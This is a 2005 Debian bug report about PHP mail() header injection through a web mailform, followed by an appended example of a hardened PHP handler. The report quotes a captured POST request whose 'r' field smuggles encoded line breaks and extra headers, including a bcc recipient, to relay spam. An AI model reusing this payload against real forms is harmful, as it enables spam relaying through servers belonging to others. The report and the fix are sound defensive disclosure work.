[php-maint] Bug#325550: php4: Problems with mail() function allow relaying through mailforms...

Luc Stroobant debian at stroobant.be
Mon Aug 29 11:58:21 UTC 2005


Package: php4
Version: 4:4.3.10-15
Severity: normal

Last weekend, we noticed some attempts to abuse one of our mailforms.
Analysis of our mail logs showed some mails were sent through a php script.
As the "To" field was hard coded in the script and register_globals was off,
the spammer must have used some other method to send the mail.

A stripped down version of the original script can be found on:
http://www.stroobant.be/phpmail/mailscript.phps

I used mod_security to intercept the POST requests...
Here is one of those requests:

r=oirkcyexud%40coza.net%0AContent-Type%3A+multipart%2Fmixed%3B+boundary%3D%22%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D1269369969%3D%3D%22%0AMIME-Version%3A+1.0%0ASubject%3A+e2dae455%0ATo%3A+oirkcyexud%40coza.net%0Abcc%3A+jrubin3546%40aol.com%0AFrom%3A+oirkcyexud%40coza.net%0A%0AThis+is+a+multi-part+message+in+MIME+format.%0A%0A--%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D1269369969%3D%3D%0AContent-Type%3A+text%2Fplain%3B+charset%3D%22us-ascii%22%0AMIME-Version%3A+1.0%0AContent-Transfer-Encoding%3A+7bit%0A%0Adzrgpjy%0A--%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D1269369969%3D%3D--%0A
&name=oirkcyexud%40coza.net
&subject=oirkcyexud%40coza.net
&email=oirkcyexud%40coza.net&submit=oirkcyexud%40coza.net

It shows he was able to insert an additional recipient through the "r" variable, which is the reaction field (and not the from or to, as one would expect).
He used some multi-part boundaries for this. IMHO this is a bug in the PHP mail() function and I'm afraid this kind of abuse can be used on quite a lot of PHP mailforms...
I can provide you with additional details and server logs if needed.

Regards,

Luc


-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.8-2-686
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages php4 depends on:
ii  libapache-mod-php4           4:4.3.10-15 server-side, HTML-embedded scripti
ii  php4-common                  4:4.3.10-15 Common files for packages built fr

-- no debconf information
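A hardened handler for a form like the one described above, as an added example (not the reporter's mailscript.phps, which is not reproduced here). The field names r, name, subject and email follow the captured POST; the recipient address is a placeholder and PHP 7 or later is assumed. The point it demonstrates: every value that reaches a mail header or the subject must be a single line, because mail() hands them to sendmail as-is and an embedded line break becomes a new header such as the injected "bcc:".

```php
<?php
// Added example; not the script from the bug report.

// True if a value contains a line break, i.e. anything that would let
// mail() emit an extra header line (To:, bcc:, Content-Type: ...).
function has_header_injection(string $value): bool
{
    return preg_match('/[\r\n]/', $value) === 1;
}

// Returns false without sending when any header-bound field is unsafe.
function send_reaction(array $post): bool
{
    $to = 'reactions@example.org';   // hard-coded recipient (placeholder)

    foreach (['name', 'subject', 'email'] as $field) {
        if (!isset($post[$field]) || has_header_injection($post[$field])) {
            return false;            // reject, do not "clean up" and continue
        }
    }
    if (filter_var($post['email'], FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }

    // Fixed header set: the visitor's address only appears in Reply-To,
    // the visitor's name only in the body, never in a header line.
    $headers = "From: webform@example.org\r\n"
             . "Reply-To: " . $post['email'] . "\r\n"
             . "MIME-Version: 1.0\r\n"
             . "Content-Type: text/plain; charset=us-ascii";

    // Line breaks are legitimate in the reaction text; with the headers
    // fixed above, header-looking lines in it are delivered as plain text.
    $body = "Name: " . $post['name'] . "\n\n" . ($post['r'] ?? '');

    return mail($to, $post['subject'], $body, $headers);
}
```

Run against the captured request, has_header_injection() is true for name, subject and email only if the spammer sprays the payload into those fields too; the fixed header set is what stops the multi-part trick in the body from adding a recipient.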